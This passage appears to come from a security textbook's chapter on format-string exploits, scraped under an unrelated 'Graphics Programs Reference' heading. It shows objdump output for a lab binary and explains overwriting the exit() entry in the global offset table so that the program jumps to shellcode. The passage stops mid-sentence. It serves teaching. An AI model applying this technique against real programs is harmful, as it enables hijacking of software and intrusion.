Graphics Programs Reference
In-Depth Information
reader@hacking:~/booksrc $ objdump -h ./fmt_vuln | grep -A1 "\ .plt\ "
10 .plt 00000060 080482b8 080482b8 000002b8 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
But closer examination of the jump instructions (shown in bold below)
reveals that they aren't jumping to addresses but to pointers to addresses. For
example, the actual address of the
printf()
function is stored as a pointer at
the memory address
0x08049780
, and the
exit()
function's address is stored at
0x08049784
.
080482f8 <printf@plt>:
80482f8: ff 25 80 97 04 08 jmp
*0x8049780
80482fe: 68 18 00 00 00 push $0x18
8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18>
08048308 <exit@plt>:
8048308: ff 25 84 97 04 08 jmp
*0x8049784
804830e: 68 20 00 00 00 push $0x20
8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>
These addresses exist in another section, called the
global offset table (GOT)
,
which is writable. These addresses can be directly obtained by displaying the
dynamic relocation entries for the binary by using
objdump
.
reader@hacking:~/booksrc $ objdump -R ./fmt_vuln
./fmt_vuln: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049764 R_386_GLOB_DAT __gmon_start__
08049774 R_386_JUMP_SLOT __gmon_start__
08049778 R_386_JUMP_SLOT __libc_start_main
0804977c R_386_JUMP_SLOT strcpy
08049780 R_386_JUMP_SLOT printf
08049784 R_386_JUMP_SLOT exit
reader@hacking:~/booksrc $
This reveals that the address of the
exit()
function (shown in bold above)
is located in the GOT at
0x08049784
. If the address of the shellcode is over-
written at this location, the program should call the shellcode when it thinks
it's calling the
exit()
function.
As usual, the shellcode is put in an environment variable, its actual
location is predicted, and the format string vulnerability is used to write the
value. Actually, the shellcode should still be located in the environment from
before, meaning that the only things that need adjustment are the first 16 bytes
of the format string. The calculations for the
%x
format parameters will be done
